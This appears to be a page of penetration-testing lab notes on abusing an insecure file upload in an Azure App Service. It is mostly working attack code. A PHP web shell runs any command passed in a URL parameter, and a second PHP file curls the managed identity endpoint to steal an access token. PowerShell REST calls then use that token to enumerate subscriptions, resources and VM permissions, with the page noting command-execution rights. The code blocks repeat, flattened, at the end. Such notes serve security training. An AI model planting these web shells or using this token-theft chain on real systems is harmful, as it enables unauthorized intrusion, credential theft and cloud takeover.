Insecure File Upload

After compromising an app service, we can request access tokens for the managed identity. If the app service contains environment variables IDENTITY_HEADER and IDENTITY_ENDPOINT, it has a managed identity.

<?php 

system($_REQUEST['cmd']);

?>

http://defcorphqcareer.azurewebsites.net/uploads/studentxshell.phtml?cmd=env

<?php 

system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');

?>

https://defcorphqcareer.azurewebsites.net/uploads/studentxtoken.phtml

We can use the access token and client ID from above with Az PowerShell. But Az PowerShell’s Get- AzRoleAssignment would not show us the permissions for the current token. It would show role assignments only to ObjectIDs (no way to get the ObjectID of the Manged Identity token that we have).

Let's use the token with Azure REST API.

We would need the subscription ID, use the code below to request it:

$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'

$RequestParams = @{
    Method = 'GET'
    Uri = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value

List all resources accessible for the managed identity assigned to the app service. Note that the only difference is the URI

$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'

$RequestParams = @{
    Method = 'GET'
    Uri = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value

The above code shows us that we do have access to a VM! Let's see what actions are allowed using the below code:

$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/bkpadconnect/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'

$RequestParams = @{
    Method = 'GET'
    Uri = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value

For example, this has the runCommand (command exucution) privilege.

PreviousApp Service Abuse NextSSTI

Last updated 2 days ago

$Token = 'eyJ0eX..' $URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01' $RequestParams = @{ Method = 'GET' Uri = $URI Headers = @{ 'Authorization' = "Bearer $Token" } } (Invoke-RestMethod @RequestParams).value

$Token = 'eyJ0eX..' $URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01' $RequestParams = @{ Method = 'GET' Uri = $URI Headers = @{ 'Authorization' = "Bearer $Token" } } (Invoke-RestMethod @RequestParams).value

$Token = 'eyJ0eX..' $URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/bkpadconnect/providers/Microsoft.Authorization/permissions?api-version=2015-07-01' $RequestParams = @{ Method = 'GET' Uri = $URI Headers = @{ 'Authorization' = "Bearer $Token" } } (Invoke-RestMethod @RequestParams).value